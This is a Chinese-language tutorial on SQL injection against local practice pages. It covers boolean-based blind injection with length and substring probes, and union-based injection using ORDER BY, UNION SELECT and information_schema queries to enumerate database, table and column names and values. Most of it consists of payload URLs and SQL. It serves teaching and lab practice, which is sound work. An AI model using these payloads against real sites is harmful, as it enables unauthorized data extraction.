布尔注入与联合注入
题记
有时候我也很喜欢这种吊儿郎当的生活方式,它让我忘记了曾经捂着胸口说痛的我。
1.布尔注入 //返回 真 或假
1、检查是否存在漏洞
访问 /boolean.php?id=1
访问 /boolean.php?id=1'
访问/boolean.php?id=1'and+1=1--+
访问/boolean.php?id=1'and+1=2--+
确认页面存在SQL注入漏洞,并且只能返回no或yes
2、判断数据库名称长度
访问 /boolean.php?id=1'+and+length(database())>=4--+
访问 /boolean.php?id=1'+and+length(database())>=5--+
确定数据库长度为5个字符。
3、判断数据库名称
第一个方法
访问/boolean.php?id=1'+and+substr(database(),1,1)='a'--+
依次修改 substr(database(),1,1)='b' substr(database(),1,1)='c' substr(database(),1,1)='d'
直到页面返回yes 确定数据库名称的第一个字符。
依次修改 substr(database(),2,1)='b' substr(database(),2,1)='c' substr(database(),2,1)='d'
直到页面返回yes 确定数据库名称的第二个字符。以此类推确定数据库的名称。
第二个方法
/boolean.php?id=1' or ORD(mid(database(),1,1))>105 #
判断数据库第一个字母acsii值为多少,然后再去查表,这样快点。
4、判断数据表名称
判断表名长度
/boolean.php?id=1'+and+length((select+table_name+from+information_schema.tables+where+table_schema='test'+limit+0,1))>=5--+
判断表名称
/boolean.php?id=1'+and+substr((select+table_name+from+information_schema.tables+where+table_schema='test'+limit+0,1),1,1)='t'--+
查询出test和users 数据表
concat是字符拼接函数。
2.联合注入//一起查询
1、在test数据库新建users表
DROP TABLE IF EXISTS `test`;
CREATE TABLE `test` (
`id` int(11) NOT NULL,
`name` varchar(20) COLLATE utf8_unicode_ci DEFAULT NULL,
PRIMARY KEY (`id`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8 COLLATE=utf8_unicode_ci;
2、访问union.php?id=1
3、访问union.php?id=1+and+1=1与union.php?id=1+and+1=2
确定该页面存在SQL注入漏洞
4、查询字段数量
/union.php?id=1+order+by+3
/union.php?id=1+order+by+4
确认表内有3个字段。
使用union select 1,2,3确认显示字段
访问 /union.php?id=1+union+select+1,2,3 或者
/union.php?id=-1+union+select+1,2,3
5、获取数据库名称
使用/union.php?id=-1+union+select+1,database(),3
获取test数据库名称
使用一下SQL获取第一个表名
select table_name from information_schema.tables where table_schema='test' limit 0,1
获取到test表名 ,修改limit0,1 limit1,1 limit2,1依次获取其他表名
6、获取字段名
使用以下sql语句获取字段名
select column_name from information_schema.columns where table_schema='test' and TABLE_NAME='test' limit 0,1
获取到id 字段 ,修改limit0,1 limit1,1 limit2,1依次获取其他字段
7、获取字段对应的值
select username from test.users limit 0,1
